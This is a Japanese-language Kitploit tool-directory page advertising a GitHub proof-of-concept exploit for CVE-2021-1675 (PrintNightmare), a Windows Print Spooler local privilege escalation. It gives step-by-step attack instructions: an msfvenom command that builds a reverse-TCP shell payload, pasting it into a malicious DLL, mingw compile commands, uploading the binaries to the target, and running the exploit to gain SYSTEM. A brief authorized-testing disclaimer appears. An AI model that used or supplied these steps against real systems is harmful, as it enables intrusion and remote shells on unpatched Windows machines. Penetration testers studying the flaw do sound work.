Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-1675 — ローカル特権昇格エクスプロイト(CVE-2021-1675 / PrintNightmare)で、悪意のあるDLLをインストールして、脆弱なWindowsシステム上でSYSTEMアクセスを獲得します。 | Kitploit
ツール/GitHubGitHub/andrewtrube/cve-2021-1675
特権昇格エクスプロイトフレームワークエクスプロイトペネトレーションテストレッドチーミングペイロード開発
GitHubandrewtrube/cve-2021-1675

CVE-2021-1675

ローカル特権昇格エクスプロイト(CVE-2021-1675 / PrintNightmare)で、悪意のあるDLLをインストールして、脆弱なWindowsシステム上でSYSTEMアクセスを獲得します。

リポジトリを見る
514年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PrintNightmare ローカル権限昇格 PoC

src/nightmare.cpp: CVE-2021-1675を悪用してシステムアクセスを取得するためのソースコード 悪意のあるDLLをインストールすることで実現 src/payload-dll.cpp: エントリ関数に悪意のあるシェルコードを含むDLLのソースコード

!!テストの許可を得たサーバーに対してのみ使用してください

概要

CVE-2021-1675は、Microsoft WindowsのPrint Spoolerサービスにおける脆弱性であり、 攻撃者がSeLoadDriverPrivilegeチェックをバイパスすることを可能にします。これは、 シェルコードを呼び出すか、Windows APIを使用してリバースシェル接続を確立する悪意のある DLLをインストールすることで、ターゲットマシン上で権限昇格を達成するために悪用できます。 2021年6月8日より前のWindows 10/8/Server 2008/Server 2012のバージョンが影響を受けます。

PoC

  1. gitリポジトリをダウンロードまたはクローンする
  2. msfvenomを使用してc言語で適切なペイロードを生成する $ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c
  3. msfvenomの出力をpayload-dll.cppの「change me」と書かれている場所に貼り付ける
  4. メインの実行ファイルをコンパイルする x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool
  5. DLLをコンパイルする x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared
  6. exeとdllをアーカイブし、ターゲットマシンにアップロードする方法を見つける zip ./bin/PrinterNightmareLPE.exe ./lib/
  7. アーカイブがターゲットのWindowsマシンに届いたら、解凍する
  8. evil.dllをc:\windows\temp\evil.dllに移動する
  9. PrintNightmareLPE.exeを実行する

注意事項

  • すべてが正常に動作している場合、エクスプロイトはWindowsのプリンタードライバーを反復処理し、結果を出力します
  • PrintNightmareLPE.exeがevil.dllを読み込むファイルパスはソースコード内で変更できます
  • 現在、悪意のあるDLLはProof-of-Conceptとしてcalc.exeを読み込むだけです
ツールをダウンロード